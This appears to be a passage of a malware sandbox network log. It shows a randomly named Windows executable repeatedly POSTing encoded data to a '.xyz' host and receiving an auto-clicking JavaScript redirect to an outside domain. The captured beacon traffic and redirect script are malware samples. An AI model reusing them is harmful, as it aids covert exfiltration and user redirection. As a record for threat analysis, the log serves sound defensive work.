Oct 11, 2024 10:01:23.442351103 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:01:23 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49828	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:25.998155117 CEST	818	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 43 30 39 67 63 6c 56 50 68 76 33 4c 6c 4e 72 2f 4d 4a 67 70 49 58 49 51 42 64 54 4b 63 31 39 50 4e 6a 66 57 75 4a 4c 4a 41 67 67 41 67 49 4d 46 44 36 62 2f 44 5a 4e 33 72 49 6c 6a 57 61 4e 73 54 39 58 43 31 72 4b 56 4e 47 6b 5a 47 49 52 2b 6c 63 6c 37 35 32 69 55 31 51 64 4f 63 53 4d 47 71 58 43 34 72 69 43 34 70 2b 2b 30 59 68 30 56 70 36 6a 51 71 77 45 6b 4c 63 75 32 36 52 36 2b 6e 53 55 55 31 78 55 39 6d 6f 4c 73 30 32 38 62 54 35 54 65 4b 62 51 37 4f 30 44 44 73 44 36 4a 61 6e 35 6e 70 70 6e 42 75 71 4e 62 49 3d Data Ascii: ATk=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1C09gclVPhv3LlNr/MJgpIXIQBdTKc19PNjfWuJLJAggAgIMFD6b/DZN3rIljWaNsT9XC1rKVNGkZGIR+lcl752iU1QdOcSMGqXC4riC4p++0Yh0Vp6jQqwEkLcu26R6+nSUU1xU9moLs028bT5TeKbQ7O0DDsD6Jan5nppnBuqNbI=
Oct 11, 2024 10:01:26.208374023 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:01:26 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49829	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:28.723764896 CEST	6445	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 2f 76 4b 45 63 51 35 6f 50 47 71 2f 30 30 4f 34 68 6e 75 6b 55 33 65 6c 67 34 75 42 55 31 4b 30 2b 54 45 6c 61 4d 4a 76 32 4c 6c 4e 31 76 4d 4d 67 70 4a 4c 49 51 5a 5a 54 4b 52 49 39 4d 35 6a 63 77 79 4a 63 73 73 67 71 41 67 49 4f 46 44 6e 47 76 44 49 4e 32 62 4d 6c 6e 4b 61 4e 73 54 39 58 41 74 72 44 6e 70 47 70 35 47 50 57 2b 6c 51 68 37 35 65 69 56 63 6c 64 4f 6f 6f 50 33 4b 58 43 59 37 69 41 4c 42 2b 6a 45 59 6a 33 56 70 69 6a 51 57 7a 45 6e 75 6a 75 32 4f 72 36 38 48 53 58 6c 77 78 54 4e 54 33 52 74 34 46 2b 72 4c 69 64 74 4b 65 56 35 4f 41 4c 41 77 57 35 38 6d 7a 78 47 35 35 79 42 37 73 53 37 31 4c 2f 48 45 63 32 62 77 4d 41 30 36 52 48 43 76 35 58 74 68 55 32 54 54 68 76 78 78 47 2b 49 32 52 7a 48 69 63 6a 30 71 72 32 63 31 76 6f 37 54 5a 46 78 64 6e 43 4a 53 30 49 74 77 4f 5a 31 65 4b 78 2b 4c 73 68 79 39 78 76 42 48 76 59 6d 2f 30 5a 47 65 41 68 71 63 53 6e 32 62 44 4f 6d 69 75 50 74 30 4e 39 55 78 46 58 6a 72 44 67 6f 6d 68 63 76 53 70 44 33 [TRUNCATED] Data Ascii: ATk=P/ZYkjLBUYEv/vKEcQ5oPGq/00O4hnukU3elg4uBU1K0+TElaMJv2LlN1vMMgpJLIQZZTKRI9M5jcwyJcssgqAgIOFDnGvDIN2bMlnKaNsT9XAtrDnpGp5GPW+lQh75eiVcldOooP3KXCY7iALB+jEYj3VpijQWzEnuju2Or68HSXlwxTNT3Rt4F+rLidtKeV5OALAwW58mzxG55yB7sS71L/HEc2bwMA06RHCv5XthU2TThvxxG+I2RzHicj0qr2c1vo7TZFxdnCJS0ItwOZ1eKx+Lshy9xvBHvYm/0ZGeAhqcSn2bDOmiuPt0N9UxFXjrDgomhcvSpD300Hf5ln6jVR8+WVIbsaMX5aHR0oum2SnOcq/LPjH89ymkulVMS9aMMRf7oVASkh051zfy8crwZtOruQ8ynJZbxHkBdaQxnZ7lgrQBBktzl2y7KrJtX+P/9mw/g71uGsnimkl2ppE0EVvIEPugex1A2nWzF/5VZjbVRU/ebPECJSiPx/Cq6KXfBQi1lXSqkXoNNqfaIs44qqDLwFleHWHAfSI6yWkB3MPNIVVouH3uweD3iXd0lepUXfzUYaPAYkGDqb19R3JCtwwyWu0l4p9lXkzmLLWahO1868OYhSgKQV3DSbYm8DYO8vNTp6tZkaAqYfJL8mSdzTffFMdOkmyFohAgc6VZwGkRqxe8dOBFOR6iJJFVW1G2KxLFzwLggoyvTztPQmH02Ov5SSSam6buW5NvV9mBrwvWFAC/yzk81xE/ByrMa5Bkez6kN8ZEKrpQgU3lypIVIktzVkCOQJq0htIe4Rv5igpjbdA+LZt/JErOq+xKA5QnszA9ZSQcOhRTo8nSMWdxyu95OTsr5IZ5Pwrek8FoXF9FwzmjHSPaC+RIgEZETdzMkGlukM/S8EqKWcDHiO/CUOn6saMCRIh7q9joOWdAnsbVaErA4hf4blmtGk6JEO1t4sjOuckCftVyZt490ZoRGm2Un5udSvIZjiWGr7DIHTQ8i [TRUNCATED]
Oct 11, 2024 10:01:28.723844051 CEST	1522	OUT	Data Raw: 73 79 47 7a 54 53 30 58 4b 4a 2f 38 71 33 35 4f 4f 6e 42 4b 44 79 49 75 2b 32 36 41 54 6f 31 46 48 4b 47 46 43 45 61 63 65 49 31 52 63 4a 63 52 61 74 57 71 78 51 6c 70 67 4d 71 4f 78 55 52 6b 74 42 49 68 36 6c 31 57 45 45 78 39 4d 6c 4c 65 64 57 Data Ascii: syGzTS0XKJ/8q35OOnBKDyIu+26ATo1FHKGFCEaceI1RcJcRatWqxQlpgMqOxURktBIh6l1WEEx9MlLedW/jiryK/3817ncmTp6g1bXtVhSD4DRQI7UEYBa4BWGkXW40H0RZkwn3u7gL22S5IeHXPegcuBLPiXv3e1LuZKD64VnXnOta8Hl3c+E7JyiK3uTb8ndnKj534zxJM1p9dcfICg1/ZR4MLqZzfrxkBuX3Ffkyj1jNf+J
Oct 11, 2024 10:01:28.917574883 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:01:28 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.20	49830	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:31.452837944 CEST	541	OUT	GET /2ncs/?ATk=C9x4nV75ALRtqPK+aBsvNSORqAmxpUqabxnIo4b2Z27N+E0QPuJF7pc8iv4PlagxECtfepEWwKhTDmrEQ68cgQIoGVeGGvf3Nn6d9y2yCfOYMDMeHUtLkc0=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:01:31.644340992 CEST	1032	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 11 Oct 2024 08:01:31 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49831	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:38.607176065 CEST	6	OUT	Data Raw: 50 Data Ascii: P
Oct 11, 2024 10:01:38.763753891 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:01:38.770224094 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49832	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:41.301958084 CEST	6	OUT	Data Raw: 50 Data Ascii: P
Oct 11, 2024 10:01:41.459801912 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:01:41.467158079 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49833	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:44.013292074 CEST	6	OUT	Data Raw: 50 Data Ascii: P
Oct 11, 2024 10:01:44.179060936 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:01:44.186793089 CEST	6	OUT	Data Raw: 4f Data Ascii: O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49834	172.247.44.157	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:46.704991102 CEST	6	OUT	Data Raw: 47 Data Ascii: G
Oct 11, 2024 10:01:46.865782976 CEST	557	IN	HTTP/1.0 200 OK Connection: close Cache-Control: max-age=259200 Content-Type: text/html;charset=utf-8 Content-Length: 428 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 2e 67 6e 33 30 31 2e 63 6f 6d 3a 31 32 33 34 35 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 [TRUNCATED] Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
Oct 11, 2024 10:01:46.871135950 CEST	6	OUT	Data Raw: 45 Data Ascii: E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49835	91.212.26.5	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
